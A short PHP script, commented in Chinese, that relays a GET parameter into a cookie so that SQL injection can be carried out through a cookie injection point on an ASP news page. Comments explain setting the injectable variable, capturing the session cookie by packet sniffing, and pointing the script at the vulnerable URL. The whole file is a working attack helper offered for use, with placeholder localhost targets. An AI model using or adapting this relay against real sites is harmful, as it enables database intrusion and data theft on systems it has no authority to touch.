<?
error_reporting(7);
ini_set("max_execution_time",0);
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);
/*
articleId 换成注入页面的变量
例如 http://127.0.0.1/news.asp?articleId=123
注入变量就是articleId
*/
$inject="articleId";
//session是原来的COOKIE,可以自己抓包获取
$session ="ASPSESSIONIDSCBRDARD=AAGHANMCCHBPLDNPCIMFOLPI;";
$cookie=$inject."=".$id.";".$session;
//echo $cookie;
//referer 是引用页地址,一般和目标网站相同
$referer="http://127.0.0.1/";
//url是注入页面的地址,注意这里不要再把注入变量写进去
$url="http://127.0.0.1/news.asp";
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
//这一句是为了把图片和iframe的相对地址改为绝对地址,根据需要可以注释掉
$content=str_replace("src="","src="".$referer,$content);
echo $content;
?>